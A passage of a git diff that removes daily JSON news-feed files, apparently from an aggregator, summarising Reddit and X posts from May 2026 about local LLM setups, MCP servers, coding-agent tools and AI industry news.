Tagline, demo GIF, founder credential, hosted landing page, multi-shot Hacker News, awesome-list inclusion. The system found that gap on its own - I never told it to study marketing. 5-min video walking through the 7 findings + what the agents drafted (Show HN body, X thread, LinkedIn post, channel plan): [https://youtu.be/Tm2svTe\\_Ed4](https://youtu.be/Tm2svTe_Ed4) The video itself - is \\*ON PURPOSE\\* 100% built by the AI who created the agents \\[happy to share th…", - "category": "ai_tools" - }, - { - "title": "Claude Code context-window: /clear after EVERY task in the codebase or are there edge cases?", - "url": "https://reddit.com/r/ClaudeAI/comments/1tfnqmc/claude_code_contextwindow_clear_after_every_task/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "cli_tool" - ], - "importance": 0.54, - "date": "2026-05-17T12:08:39.000Z", - "summary": "So I have been recently coding a bunch with the following setup: I am launching Claude Code CLI inside of my repo (a complete shopify theme; if you are unfamiliar it is 3-8mb of source code, structurally something like this: `layout/ 2–3 files (theme.liquid = root shell)` `templates/ 15–25 files (one per page type, JSON or liquid)` `sections/ 30–50 files (reusable page blocks)` `snippets/ 20–40 files (sub-components, like partials)` `assets/ 30–60 files (css, js, svgs)` `locales/ 5–10 files (i18n JSON)` `config/ 2 files (settings_schema.json = theme editor config)` ) I also have an app set up that shows, what the current usage of the models context windows is currently at in %. 
**Recently I have been wondering: say I give claude quite a heavy task that involves the typical stack of 3 files (1 .js, 1 .liquid and 1 .css) and this instantly bumps up the context window from 0% to 10%, is there a golden rule that one should always do /clear after such an extensive task or does it depend if say, the next task depends on the same 3 files?** Do you guys have any advice on when the perfect time is to /clear? What are your experiences with this? Do you know of any addons that could facilita…", - "category": "ai_tools" - }, - { - "title": "LLM's on Android (Snapdragon 8 Elite) MOE Experience", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tg3ssd/llms_on_android_snapdragon_8_elite_moe_experience/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-05-17T22:22:53.000Z", - "summary": "So I bought a phone with Snapdragon 8 elite (gen 4) and 24GB ram (Honor magic 7 pro). My experience has been mixed but with solid potential. Hexagon (Snapdragon 8 Elite) NPU and OpenclGPU support and updates have been rolling in fast but still the fastest prompt processing and token generation have mostly been CPU (I would bet that soon enough either NPU or GPU will be faster or more realistically both). CPU has the downside of generating more heat than NPU and GPU inference but overall it's still the fastest **currently**. Now there are no phones with 32gb ram without a virtual ram extension which doesn't work with LLM's ofc, so the best you will do is 24gb ram. What can you do with 24gb ram and a smartphone processor though? Quite a lot actually, MOE has been getting quite popular and their Q4 quants of these models are great and fit into the 24GB. My personal recommendation is IQ4\\_XS and MXFP4\\_MOE since with what I have tested MXFP4\\_MOE is quite faster but for the size IQ4\\_XS can't be beaten. 
Q4\\_0 is more optimised but quality wise it's worse than both (subjectively from my own experience). Goes without saying but Q4\\_K\\_M is also quite reliable from a speed/quality/size s…", - "category": "ai_models" - }, - { - "title": "While waiting for Fara-1.5 for my coding harness", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tg3kbz/while_waiting_for_fara15_for_my_coding_harness/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-05-17T22:13:11.000Z", - "summary": "Hi all, Not sure many people are aware so wanted to give a word about [Fara-1.5 release](https://www.microsoft.com/en-us/research/video/magenticlite-a-full-stack-agentic-experience-powered-by-small-models/). => this release will likely be the big sister of [Fara-7B](https://huggingface.co/bartowski/microsoft_Fara-7B-GGUF) and built on top of Qwen3.5 Actual Fara-7B performs not bad at all but actually requires a proper implementation, and I really hope the 1.5 will be SOTA, in different (including smaller) versions, and may simplify all the pipeline! I gave my coding agent harness extra built-in features: * browser automation tool allowing navigation either via accessibility tree only (CDP / DOM) or via vision + grounding (the above video uses Qwen3.6 35B + Fara-7B) * the possibility to generate prefilled \"skills\" directly from conversation history + Jobs to schedule auto-run * recording from user actions (requires vllm for video and maybe llama.cpp following [this PR](https://github.com/ggml-org/llama.cpp/pull/21858)?) 
Feel free to have a look at the project, it is focused on controllability and low context footprint: [https://github.com/leflakk/openclose](https://github.com/le…", - "category": "ai_models" - }, - { - "title": "Pushing the limit: minimax m2.7 q8_0 128k on 2x3090, 256GB DDR4", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tg37t6/pushing_the_limit_minimax_m27_q8_0_128k_on_2x3090/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-05-17T21:59:27.000Z", - "summary": "CPU is just a secondhand 10900x. Using 128k context, unquantized kv cache. Model is at q8\\_0 to mitigate some weird behavior I was seeing at lower quants. Speed is very slow at around 50tps pp, 10tps tg, but usable for coding agent workflows. Anybody else running MoE models in this size class on relatively low-end hardware? For my purposes, speed is less important than accuracy, as long as it's not like literally all day. Any other models you'd recommend I'd try or additional optimization tips that could help within my constraints? I wish they'd released the draft model for MTP on this model but it looks like they declined to do so for 2.7. 
My ik\\_llama flags -- sorry for the funny formatting, this is pasted out of my vibe coded NixOS config: \"${ik-llama-cuda}/bin/llama-server\" + \" -m ${modelPath}\" + \" --host 0.0.0.0\" + \" --port ${toString cfg.port}\" + \" -c ${toString cfg.contextLength}\" + \" -ngl 999\" + \" --cpu-moe\" + \" -sm graph\" + \" -fa on\" + \" -t 16\" + \" -tb 16\" + \" -b 4096\" + \" -ub 4096\" + \" -np 1\" + \" -muge\" + \" -ger\" + \" --jinja\" + \" --metrics\" + \" --temp 1.0\" + \" --top-p 0.95\" + \" --top-k 40\" + \" --min-p 0.01\"", - "category": "ai_models" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-18.json b/data/news-feed-2026-05-18.json deleted file mode 100644 index c2cb2b0..0000000 --- a/data/news-feed-2026-05-18.json +++ /dev/null @@ -1,273 +0,0 @@ -{ - "generated": "2026-06-05T00:44:40.968Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-18", - "article_count": 15, - "archived_story_count": 665, - "articles": [ - { - "title": "obsidian-mcp-server: v3.2.0 Released", - "url": "https://reddit.com/r/ClaudeAI/comments/1tg692a/obsidianmcpserver_v320_released/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "product_launch", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "mcp", - "product_launch", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-18T00:07:48.000Z", - "summary": "[obsidian-mcp-server](https://github.com/cyanheads/obsidian-mcp-server) [3.2.0](https://github.com/cyanheads/obsidian-mcp-server/releases/tag/v3.2.0) adds an `omnisearch` mode to `obsidian_search_notes` (BM25-ranked, typo-tolerant, PDF + OCR via the [Omnisearch](https://github.com/scambier/obsidian-omnisearch) and [Text Extractor](https://github.com/scambier/obsidian-text-extractor) plugins), MCP-spec cursor pagination across all search modes, and a `nameRegex` filter on `obsidian_list_commands`. 
Recent Releases: [v3.1.11](https://github.com/cyanheads/obsidian-mcp-server/releases/tag/v3.1.11) brought the same `nameRegex` filter to `obsidian_list_tags`, and [v3.1.10](https://github.com/cyanheads/obsidian-mcp-server/releases/tag/v3.1.10) added server-level instructions on the MCP `initialize` response. Note: The HTTP endpoint in Omnisearch is disabled by default. You must enable it in the Omnisearch plugin settings. Let me know if you have any questions/issues!", - "category": "ai_tools" - }, - { - "title": "Witchcraft, fast local semantic search on top of SQLite [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1tgqyo8/witchcraft_fast_local_semantic_search_on_top_of/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update", - "open_source", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "open_source", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-18T16:00:06.000Z", - "summary": "**Witchcraft (https://github.com/dropbox/witchcraft)**, an open source project that I built at Dropbox, is a from-scratch re-implementation of Stanford's XTR-Warp semantic search engine ( [https://github.com/jlscheerer/xtr-warp](https://github.com/jlscheerer/xtr-warp) ) in safe rust, using a single-file SQLite database as backing storage, making it suitable for client-side deployment. It runs completely stand-alone on your device, needs no API keys, no vector database, no chunking strategy, no fancy re-rankers, and it is lightning fast (20ms p.95 end-to-end search latency on NFCorpus, at 33% NDCG@10, on an Apple Macbook Pro M2 Max, more than twice as fast as the original XTR-WARP on server-class hardware, at similar accuracy.) The project also includes **Pickbrain**, a CLI that indexes your Claude Code and OpenAI Codex session transcripts, memory files, and authored documents into a Witchcraft database for fast semantic search. 
Ever wondered \"what was that conversation where I fixed the auth middleware?\" — pickbrain finds it, and lets you resume the session directly. There is also a /pickbrain skill for both Claude and Codex, which equips those tools with global memory across all…", - "category": "ai_research" - }, - { - "title": "I built an open-source VS Code extension to visualize and debug Claude Code sessions in real-time", - "url": "https://reddit.com/r/ClaudeAI/comments/1tgj45v/i_built_an_opensource_vs_code_extension_to/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool", - "cli_tool" - ], - "importance": 0.8600000000000001, - "date": "2026-05-18T10:59:47.000Z", - "summary": "Hey everyone! Running Claude Code in the terminal is amazing, but I hated the \"black box\" feeling of not knowing exactly what the agent was doing behind the scenes, or when it got stuck in an infinite loop. To solve this, I built \\*\\*Argus\\*\\* — an open-source visual debugger and observability tool for Claude Code right inside VS Code. Key features: \\* \\*\\*Real-time Timeline:\\*\\* Streams the JSONL transcripts instantly to show agent steps (Bash, Read, Write, WebFetch). \\* \\*\\*Dependency Graph:\\*\\* Visually maps out which files the agent is touching and how they connect. \\* \\*\\*Cost & Loop Detection:\\*\\* Caught a few duplicate reads and retry loops that were burning tokens unnecessarily. It’s completely open-source (MIT) and lightweight. I’d love to hear your feedback on the architecture or features you'd like to see next! 
GitHub: [https://github.com/yessGlory17/argus](https://github.com/yessGlory17/argus)", - "category": "ai_tools" - }, - { - "title": "Lemonade v10.5.1: an MTP + ROCm 7.13 quick start for Strix Halo", - "url": "https://reddit.com/r/LocalLLaMA/comments/1th0z6k/lemonade_v1051_an_mtp_rocm_713_quick_start_for/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-18T20:55:54.000Z", - "summary": "Update to Lemonade v10.5.1, then: ``` # Get the model lemonade pull Qwen3.6-27B-MTP-GGUF # Get ROCm 7.13 lemonade backends install llamacpp:rocm # Load the model (MTP args auto-applied) lemonade load Qwen3.6-27B-MTP-GGUF --llamacpp rocm --ctx-size 0 ``` Shown in the video taking a look in the mirror with the help of Pi agent. Github: https://github.com/lemonade-sdk/lemonade Discord: https://discord.gg/5xXzkMu8Zk PS. u/lucifer-vali fixed Fedora 43 support in this release as well :)", - "category": "ai_models" - }, - { - "title": "OpenAI Flex and Priority service tiers are now available for supported OpenAI models, including GPT-5.5. Use Flex for lower-cost requests when latency is less important, or Priority for higher-priority processing when you need it. In the A…", - "url": "https://x.com/NanoGPTcom/status/2056425379171058008", - "source": "X search / AI model updates", - "tags": [ - "api_update", - "product_launch" - ], - "matching_tags": [ - "api_update", - "product_launch" - ], - "importance": 1, - "date": "2026-05-18T17:23:11.000Z", - "summary": "OpenAI Flex and Priority service tiers are now available for supported OpenAI models, including GPT-5.5. Use Flex for lower-cost requests when latency is less important, or Priority for higher-priority processing when you need it. 
In the API, set service_tier to \"flex\" or", - "category": "ai_models" - }, - { - "title": "Tried every Hermes Agent alternative so you don't have to (2026 roundup)", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tgsttq/tried_every_hermes_agent_alternative_so_you_dont/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-18T17:02:19.000Z", - "summary": "Been running Hermes since launch. Love it. But a few people on my team can't get past the setup, and honestly the security situation with some of these self-hosted agents has gotten complicated enough that I put together a proper comparison. Eleven alternatives, split into OSS and managed. Quick take on each: **Open Source** **OpenClaw** is the obvious first stop. 347k GitHub stars, 24+ platform integrations, massive skill library. The security track record is genuinely rough though. 9 CVEs in four days in March, \\~20% of ClawHub packages flagged as malicious by independent audits. Use it but harden it first. **TrustClaw** is what OpenClaw should have been from a security standpoint. OAuth only, sandboxed execution, 20k+ managed integrations. You give up some control but your credentials actually stay safe. **PicoClaw** is absurd in the best way. Go binary, under 10MB, runs on $10 hardware, boots in under a second. Still pre-1.0 but if you need something lean it's hard to argue with. **ZeroClaw** is the Rust rewrite. 3.4MB binary, sub-10ms startup, minimal dependencies. Not trying to be feature-rich. Just trying to stay running. 
**nanobot** is \\~4000 lines of Python you can actual…", - "category": "ai_models" - }, - { - "title": "Configuration Qwen3.6-35b-a3b (12Gb VRAM)", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tgrk75/configuration_qwen3635ba3b_12gb_vram/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-18T16:20:14.000Z", - "summary": "Has anyone here tested different KV cache quantizations and compared their performance? I’m currently using the model in Q5\\_K\\_M with Q4 KV cache on a 12 GB VRAM GPU. With this setup, I’m offloading about 27 MoE layers to the CPU and getting around 90–100 tok/s with a 128k context window. I’m trying to see if I can push it a bit further, since I’m using it inside my own AI agent. The model is already pretty smart, but in agentic workflows it’s not always as strong or consistent as I’d like. I’d be curious to know what KV quantization settings people are using, and how much difference they noticed in speed, memory usage, and output quality. Also, would you recommend trying a different model quantization than Q5\\_K\\_M for this setup? For example, would Q4\\_K\\_M, Q6\\_K, or another quant be a better trade-off for speed, VRAM usage, and reasoning quality?", - "category": "ai_models" - }, - { - "title": "Qwen 35b a3b surprises me", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tgqpa8/qwen_35b_a3b_surprises_me/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-18T15:50:58.000Z", - "summary": "Just wanted to share that I'm pretty happy about Qwen 35b a3b agentic coding performance. I'm running the model in q80 quant, kv cache both q8\\_0 as well, with 262144 in 4090 + 5060 ti, via llama.cpp backend with claude code pointing to localhost. 
For demo/data analytics purposes, it works pretty well. I haven't used it for large codebases, but it definitely is better than gemma4 26b in my use case. One thing that surprises me is that it seems to get better outcome in agentic coding, than chat. When using it with just chat UI, i found the code qwen35b provide a bit too clunky. I wonder of others have compared its performance against open source harnesses (Pi / opencode).", - "category": "ai_models" - }, - { - "title": "xAI Launches Grok Build — Three-Way Coding War Is Now Open", - "url": "https://x.com/Business_AI/status/2056374805163856261", - "source": "Aligned News (Scoble)", - "tags": [ - "product_launch", - "agent_tool" - ], - "matching_tags": [ - "product_launch", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-18T14:47:43.601Z", - "summary": "xAI has entered the agentic coding market with Grok Build, creating a three-way race with Claude Code and OpenAI Codex for developer workflow ownership. Braygent's take: this matters for everyone building with AI.", - "category": "ai_tools" - }, - { - "title": "New models when? Forecasting release date.", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tgh8to/new_models_when_forecasting_release_date/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "product_launch", - "open_source" - ], - "matching_tags": [ - "product_launch", - "open_source" - ], - "importance": 1, - "date": "2026-05-18T09:21:34.000Z", - "summary": "After the recent releases, there's almost a sense of emptiness. When do you think new models will be released? Looking at the chart, it's between the end of May and the beginning of June, but... 
I don't know why, it seems like something's changing about \"open weights\"", - "category": "ai_models" - }, - { - "title": "Cutoff dates of open source models", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tg9rcp/cutoff_dates_of_open_source_models/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "mcp", - "open_source" - ], - "matching_tags": [ - "mcp", - "open_source" - ], - "importance": 1, - "date": "2026-05-18T02:48:12.000Z", - "summary": "I was trying Qwen 3.6-27b and Gemma4 in a siomple web chat. Asked them both a qn like 'recommend the best llm for a 5060ti' and was suprised when they both replied 'user is asking about a card that doesn't exist'. I then saw their knowledge cutoff was early 2025, hence why. But tech advances so fast, in that 1yr+ there have been tons of changes in languages, frameworks, best practices and tech, not to mention AI. of course the model could use MCP etc to do a web search, but its pretraining is still using 1yr+ older knowledge. Found that suprisising and probably explains a few things, but its not something widely known I think", - "category": "ai_models" - }, - { - "title": "Follow-up: adding Ollama support to my open-source cursor-aware AI app - looking for beta testers with vision-capable local models", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tg4ux6/followup_adding_ollama_support_to_my_opensource/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-05-17T23:07:21.000Z", - "summary": "EDIT 2: Trick-Assignment-828 pointed me at the actual rule update from the mods - Rule 3 Low Effort was expanded to cover LLM-assisted posts without disclosure. Disclosing now: Disclosure: I'm a non-native English speaker (German). This post was drafted by me with AI used for a grammar pass. Structure, technical content, the ask, the Skales reference, and all decisions are mine. 
Wasn't aware of the rule update until called out in comments. Apologies for missing it. If mods feel this still violates Rule 3 even with disclosure, happy for it to come down. Otherwise leaving up so the technical thread can continue. \\--- EDIT: Updated model list based on this thread's feedback... \\[Original post body\\] Edit: Updated model list based on this thread's feedback — Qwen3.5/3.6 family and Qwen3.6-35B-A3B are the current recommendations, not the older Qwen2.5-VL / Llama 3.2 Vision references that were carried over from my older post. Thanks jacky2060, ilintar, and others for the corrections. \\--- Follow-up to my [latest post](https://www.reddit.com/r/LocalLLaMA/comments/1tcl96f/looking_for_fast_visioncapable_local_models_that/) asking about fast vision-capable local models with reliable tool c…", - "category": "ai_models" - }, - { - "title": "memv ships an MCP server — OSS memory layer for agents, now usable from any MCP client", - "url": "https://reddit.com/r/ClaudeAI/comments/1tg6jjq/memv_ships_an_mcp_server_oss_memory_layer_for/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "tool_update" - ], - "matching_tags": [ - "mcp", - "tool_update" - ], - "importance": 0.9400000000000001, - "date": "2026-05-18T00:20:41.000Z", - "summary": "memv (OSS, Python) gained an MCP server today. If you're building on Claude Desktop / Code / Cursor — or your own MCP host — you get persistent, structured memory without writing integration code. 
```bash pip install \"memvee[mcp]\" memv-mcp --db-url memory.db --llm-model openai:gpt-4o-mini ``` Or mount it inside your own process: ```python from memv.mcp.server import create_server server = create_server( db_url=\"memory.db\", default_user_id=\"alice\", embedding_client=my_embedder, llm_client=my_llm, ) server.run(transport=\"streamable-http\") ``` **Surface:** - 5 MCP tools: `search_memory`, `add_memory`, `add_conversation`, `list_memories`, `delete_memory` - LLM optional — retrieval/add work LLM-free; only `add_conversation` extraction needs one - Per-user isolation at every tool boundary, including `delete_memory` ownership check - Concurrent extractions for the same user coalesce onto one task For context if you haven't seen memv before: predict-calibrate extraction (Nemori-inspired) so we don't store everything, bi-temporal model so contradictions expire instead of overwriting, hybrid retrieval (vector + BM25 + RRF). Docs: https://vstorm-co.github.io/memv/advanced/mcp-server/ GitHub:…", - "category": "ai_tools" - }, - { - "title": "Every Markdown File You Write for AI is Already Lying to It", - "url": "https://reddit.com/r/ClaudeAI/comments/1tgilrn/every_markdown_file_you_write_for_ai_is_already/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 0.7, - "date": "2026-05-18T10:34:32.000Z", - "summary": "CLAUDE.md files. System prompts. README files with setup instructions. Architecture docs. API references. Runbooks. Onboarding guides. If you've written a markdown file meant for an AI to read, it almost certainly contains values that were true when you wrote them and are no longer true now. The port your dev server runs on. The current version of the package. Which env vars are actually set. How many tests exist. Whether a service is running. These things change constantly, and markdown doesn't know it. 
So developers do what honest writers do - they add caveats. \"Check package.json if this is stale.\" \"Verify before running.\" \"New packages may have been added since this was written.\" The intent is good. The effect is a list of things the AI has to go verify before it can do anything you actually asked for. We counted them in a real CLAUDE.md. There were seven. And CLAUDE.md is just one file type - the same problem exists everywhere AI reads markdown today. # The Pre-Flight Tax Here's a representative CLAUDE.md. Nothing here is invented - these are patterns from real production repos: # CLAUDE.md > Before starting any session: Read ~/projects/api-core/SYNC.md first and check for…", - "category": "ai_tools" - }, - { - "title": "Claude Code feels completely different once you install this. Anthropic quietly released an official plugin that transforms Claude Code from a simple coding assistant into a full AI dev environment. It scans your entire project and automat…", - "url": "https://x.com/Shruti_0810/status/2056266132592468126", - "source": "X / @shruti_0810", - "tags": [ - "mcp", - "developer_tool" - ], - "matching_tags": [ - "mcp", - "developer_tool" - ], - "importance": 0.7, - "date": "2026-05-18T06:50:24.000Z", - "summary": "Claude Code feels completely different once you install this. Anthropic quietly released an official plugin that transforms Claude Code from a simple coding assistant into a full AI dev environment. 
It scans your entire project and automatically recommends: → MCP servers →", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-19.json b/data/news-feed-2026-05-19.json deleted file mode 100644 index d724b0e..0000000 --- a/data/news-feed-2026-05-19.json +++ /dev/null @@ -1,275 +0,0 @@ -{ - "generated": "2026-06-05T00:44:41.184Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-19", - "article_count": 15, - "archived_story_count": 634, - "articles": [ - { - "title": "Google launches Antigravity 2.0 with an updated desktop app and CLI tool", - "url": "https://techcrunch.com/2026/05/19/google-launches-antigravity-2-0-with-an-updated-desktop-app-and-cli-tool/", - "source": "TechCrunch AI", - "tags": [ - "product_launch", - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "product_launch", - "cli_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-19T19:45:37.755Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Google releases Gemini 3.5 Flash for complex agentic workflows, coding, and reasoning at 289 tokens per second and higher scores than Gemini 3.1 Pro on Terminal-Bench 2.1, GDPval-AA, and MCP Atlas — Large token quotas appeared in Google Cloud Console before wider rollout.", - "url": "https://www.digg.com/ai/9p5cqkyn?rank=2", - "source": "Digg AI", - "tags": [ - "mcp", - "product_launch", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "product_launch", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-19T19:45:35.241Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Anthropic just bought the company that generates most production MCP servers", - "url": "https://reddit.com/r/ClaudeAI/comments/1thkkrb/anthropic_just_bought_the_company_that_generates/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "mcp", - "developer_tool" - ], - 
"importance": 1, - "date": "2026-05-19T11:52:46.000Z", - "summary": "Anthropic acquired Stainless on Monday for a reported $300M+. Most coverage is framing this as a developer tools acquisition. Stainless is best known for generating the official Python and Node SDKs that ship with OpenAI, Google, Meta, Cloudflare, and Anthropic. The SDK story is real. The MCP side is the part that matters here. Stainless was one of the first vendors to extend their compiler to produce MCP servers from the same OpenAPI specs that produce their SDKs. MCP hit \\~97M monthly SDK downloads by December 2025 and around 10,000 production servers by early 2026. A lot of that production code was Stainless-generated. Anthropic now owns the dominant MCP server generator. What actually changed hands on Monday: 1. The engineering team. Roughly 40-50 people including founder Alex Rattray, who previously built Stripe's patented SDK generation system. Now reporting to Katelyn Lesse in Anthropic's Platform Engineering org. 2. The technology. The generator, the templates, the language-specific runtimes, the OpenAPI extensions Stainless invented for SDK-specific edge cases. 3. The hosted product is winding down. New signups stopped Monday. New SDK and MCP server generations stopped Mo…", - "category": "ai_tools" - }, - { - "title": "favorite Agentic Coding Harness", - "url": "https://reddit.com/r/LocalLLaMA/comments/1th5t1b/favorite_agentic_coding_harness/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "developer_tool", - "cli_tool", - "agent_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-18T23:53:49.000Z", - "summary": "So far, I’ve tried Codex CLI, Claude Code, Gemini CLI, OpenCode, and recently, Pi with local models. Pi is the leanest of them all, with just four tools: read, write, edit, and bash. Its system prompt is only under 2K tokens, and it's perfect for local models. 
I've been trying out Qwen 27B-MXFP8 with it, and it's much better than I expected! It doesn't have fancy bells and whistles like multi agents, but the only thing I’m missing is searching the web for documentation. I’m sure you can get it through an extension, but you probably won’t get the same robust search features you get from commercial platforms anyways. This might be my new favorite! What’s yours?", - "category": "ai_models" - }, - { - "title": "Tripsy's latest update integrates Model Context Protocol (MCP), allowing users to plan trips using AI clients and tools. AI can adjust itineraries by time, location, or preference, and a command-line interface has also been added for advan…", - "url": "https://x.com/AlternativeTo/status/2056637498978398395", - "source": "X / @alternativeto", - "tags": [ - "mcp", - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "mcp", - "cli_tool", - "tool_update" - ], - "importance": 0.8600000000000001, - "date": "2026-05-19T07:26:04.000Z", - "summary": "Tripsy's latest update integrates Model Context Protocol (MCP), allowing users to plan trips using AI clients and tools. AI can adjust itineraries by time, location, or preference, and a command-line interface has also been added for advanced users. 
https:// alternativeto.net/news/2026/5/tr ipsy-adds-mcp-integration-and-cli-support-for-ai-powered-travel-planning-and-organization/ …", - "category": "ai_tools" - }, - { - "title": "Google introduces Gemini Spark, a 24/7 agentic assistant with Gmail integration", - "url": "https://techcrunch.com/2026/05/19/google-introduces-gemini-spark-a-24-7-agentic-assistant-with-gmail-integration/", - "source": "TechCrunch AI", - "tags": [ - "product_launch", - "tool_update" - ], - "matching_tags": [ - "product_launch", - "tool_update" - ], - "importance": 1, - "date": "2026-05-19T19:45:37.747Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Edison Scientific announces partnership with Incyte to deploy Kosmos AI agent across full drug development pipeline from molecular design through FDA approval — Incyte becomes first company to integrate the system end-to-end.", - "url": "https://www.digg.com/ai/r5p7scr1?rank=3", - "source": "Digg AI", - "tags": [ - "product_launch", - "agent_tool" - ], - "matching_tags": [ - "product_launch", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-19T19:45:35.257Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Why is LM-Studio download page showing me 0.4.7 to download when the latest version is 0.4.13?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1thx8eo/why_is_lmstudio_download_page_showing_me_047_to/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "github_release", - "tool_update" - ], - "matching_tags": [ - "github_release", - "tool_update" - ], - "importance": 1, - "date": "2026-05-19T19:17:46.000Z", - "summary": "I'm currently running LM-Studio 0.4.12. In the app if I check for updates it says there's a new version (0.4.13), I can read the changelog for 0.4.13, but when I go to [https://lmstudio.ai/download](https://lmstudio.ai/download) it shows 0.4.7. What's going on here? 
Anyone knows?", - "category": "ai_models" - }, - { - "title": "OpenAI cofounder Andrej karpathy just joined anthropic and the talent war is officially over", - "url": "https://reddit.com/r/ClaudeAI/comments/1thw3bu/openai_cofounder_andrej_karpathy_just_joined/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "product_launch" - ], - "matching_tags": [ - "api_update", - "product_launch" - ], - "importance": 1, - "date": "2026-05-19T18:40:02.000Z", - "summary": "this happened literally today ,andrej karpathy one of the most respected ai researchers alive nd the guy whose youtube lectures taught half the developers in this sub how neural networks work, just announced he is joining anthropic's pre training team. He's the 3rd senior openai figure to defect to anthropic in under two years. Jan leike left in may 2024, John schulman (co-founder) left in august 2024 and now karpathy. He is joining the pre training team under nick josef and building a new team focused on using claude to accelerate pre training research which means Anthropic is betting that claude can help make itself smarter, thats recursive self improvement with one of the most capable researchers in the world leading it. The musk trial verdict came in yesterday with the jury ruling in altman's favor, karpathy announces today voilaa . The timing is either coincidental or the most savage talent acquisition move in tech history. I hv been watching this trajectory while building my own workflows on claude ,every month the ecosystem around claude gets stronger. 
The connectors mean claude orchestrates professional creative tools natively, the api means platforms like magic hour and k…", - "category": "ai_tools" - }, - { - "title": "Floor for local meeting summarization on a 6GB GPU: qwen3.5:0.8b works at 57s, Granite 4 350M hallucinates", - "url": "https://reddit.com/r/LocalLLaMA/comments/1thsset/floor_for_local_meeting_summarization_on_a_6gb/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-05-19T16:50:50.000Z", - "summary": "Disclosure: I made this. Open-source, MIT, Windows + Linux. Not affiliated with [voiceflow.com](http://voiceflow.com) (the chatbot SaaS, name collision, sorry). Why this exists: I wanted local-only dictation and meeting transcription, because audio shouldn't have to leave the machine just to become text. I had a 6GB GPU sitting there doing nothing most of the day. So I built it: hold a hotkey, faster-whisper transcribes locally, text pastes at the cursor. v1.6.0 shipped today and adds the meetings recorder: mic + system audio into one stereo file, transcribed locally, summary goes through whatever endpoint you point it at (Ollama, llama.cpp, Groq, OpenAI). The only network call in the whole product is the optional summary, and you pick where it goes. The on-topic part for this sub: mini models on real workloads. v1.6.0 was the excuse to actually benchmark this on real meeting transcripts instead of toy prompts. I tried the latest small Qwen first, qwen3.5:0.8b (873M, Q8\\_0). Test rig: RTX 3060 Laptop 6GB, \\~4.3GB free after Whisper loads, Ollama 0.23, Arch. Input: a real 4-minute meeting, \\~2900 chars. It works, with one caveat. 
